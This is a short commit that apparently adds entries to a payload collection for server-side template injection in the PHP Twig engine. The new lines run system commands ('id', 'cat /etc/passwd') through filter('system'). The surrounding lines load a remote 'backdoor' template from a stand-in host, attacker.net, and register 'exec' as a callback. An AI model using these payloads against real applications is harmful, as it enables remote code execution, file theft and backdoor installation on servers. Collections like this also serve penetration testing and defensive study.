Added filter(system) twig RCE

This commit is contained in:
SakiiR SakiiR 2020-03-29 23:19:27 +02:00
parent 231e41a59b
commit 8b78c2fe71

View File

@ -157,6 +157,8 @@ $output = $twig > render (
{{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
```
Example with an email passing FILTER_VALIDATE_EMAIL PHP.